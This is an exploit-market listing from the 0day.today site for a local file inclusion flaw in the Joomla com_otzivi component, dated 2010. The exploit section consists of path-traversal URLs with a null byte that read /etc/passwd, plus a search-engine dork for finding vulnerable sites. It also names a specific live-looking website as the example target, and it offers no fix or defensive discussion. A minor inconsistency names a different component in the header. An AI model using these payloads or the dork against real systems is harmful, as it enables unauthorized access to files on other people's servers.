[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Joomla Component com_otzivi Local File Inclusion

Author
AtT4CKxT3rR0r1ST
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-10966
Category
web applications
Date add
18-02-2010
Platform
unsorted
================================================
Joomla Component com_otzivi Local File Inclusion
================================================

####################################################################
.:. Author         : AtT4CKxT3rR0r1ST  
.:. Script         : Joomla Component com_ccnewsletter
.:. Bug Type       : Local File Inclusion [LFI]
.:. Dork           : inurl:"com_otzivi"

####################################################################

===[ Exploit ]===

www.site.com/index.php?option=com_otzivi&controller=[LFI]
www.site.com/index.php?option=com_otzivi&controller=../../../../../../../../../../etc/passwd%00


Example:

http://www.golden-truffle.ru/index.php?option=com_otzivi&controller=../../../../../../../../../../etc/passwd%00

####################################################################



#  0day.today [2024-12-23]  #